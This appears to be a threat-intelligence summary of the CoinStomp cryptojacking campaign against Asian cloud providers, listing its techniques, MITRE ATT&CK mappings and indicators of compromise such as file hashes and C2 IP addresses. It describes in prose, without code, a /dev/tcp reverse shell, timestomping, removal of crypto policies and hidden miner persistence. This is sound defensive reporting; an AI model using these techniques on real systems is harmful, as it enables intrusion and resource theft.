Threat Research

CoinStomp Malware Family Targets Asian Cloud Service Providers

Securonix

Researchers from Cado Security uncovered CoinStomp, a Linux-based malware family targeting Asian Cloud Service Providers to mine cryptocurrency using a shell-script campaign. It employs timestomping, removal of cryptographic policies, and a /dev/tcp reverse shell for C2, and references a prior cryptojacking operation named Xanthe. #CoinStomp #Xanthe

Keypoints

  • CoinStomp is a campaign composed of shell scripts targeting Asian Cloud Service Providers to mine cryptocurrency.
  • Timestomping is used as an anti-forensics measure to disguise activity and obstruct remediation.
  • The malware removes system cryptographic policies and even kills the crypto policy process to weaken defenses.
  • C2 communication is conducted via a /dev/tcp reverse shell to a remote server (106.53.115.114:443) using HTTP traffic.
  • There are references to a prior cryptojacking campaign named Xanthe, including a URL in Cron-related activity intended to foil attribution.
  • Additional payloads (Sshno, Stater, Adupd, Dhcpclient) are persisted as root-privileged systemd services; Dhcpclient is a modified XMRig miner and uses config.jason/xmrig.jason files.

MITRE Techniques

  • [T1070.006] Timestomp – Manipulates file timestamps to hinder forensics. “Timestomping is the process of manipulating timestamps for files dropped or utilised during a malware attack.”
  • [T1562.001] Impair Defenses – Removes cryptographic policy files and kills the crypto process to undermine security controls. “Removal of the configuration files that define system-wide cryptographic policies and even kill the crypto process itself.”
  • [T1059.004] Unix Shell – Uses /dev/tcp to establish a reverse shell/C2 channel. “Line 4 establishes a reverse shell connection via the /dev/tcp device file to a remote server at 106[.]53.115.114 over port 443.”
  • [T1071.001] Web Protocols – C2 traffic over HTTP on port 443, enabling data exchange with the C2 server. “the traffic itself is unencrypted – as it’s being transferred using HTTP.”
  • [T1053.003] Cron – Scheduling tasks via Cron for persistence and potential callback actions. “Creation of scheduled tasks via the Cron scheduler is a common malware persistence technique on Linux systems.”
  • [T1543.003] Create/Modify Systemd Service – Payloads persisted as systemd services with root privileges. “persisted as system-wide systemd services, resulting in them being executed with root privileges and kept alive.”
  • [T1027] Obfuscated/Encrypted Files and Information – Obfuscated binaries used as payloads. “Sshno is a heavily-obfuscated 32 bit ELF binary.”
  • [T1496] Resource Hijacking – Mining cryptocurrency using the infected host’s resources. “mining capabilities of this malware” and the campaign’s objective to mine cryptocurrency.

Indicators of Compromise

  • [Filename] d.py – cb9f0dca725fa0eae8a39c7d07e62441d6ae50b776df8a9ab1cb7f86a22c75ca
  • [Filename] zz.sh – 17dd410fd7d42d34bd01b96c135f7890f1b3b15354a5d67f63acb70044752397
  • [Filename] adupd – 7a065c7f0d17436809ce3a9bb6bebb74d4207f8555b8291c7ee3e3deac492a2b
  • [Filename] dhcpclient – c1a3f32689461fb9570d4e212bba18391f6bb413bc77cb16def92d0226320e7d
  • [Filename] sshno – 57c2fef3dd66a3756e85df53ad825d7bf6ff1ee38504323b756b4fc5d47023c3
  • [Filename] stater – 3420588e7231167052775e68bab84384f449e08f1dd9ec9ba29f8437b5f86334
  • [IP Address] 205.185.113.151
  • [IP Address] 106.53.115.114

Read more: https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/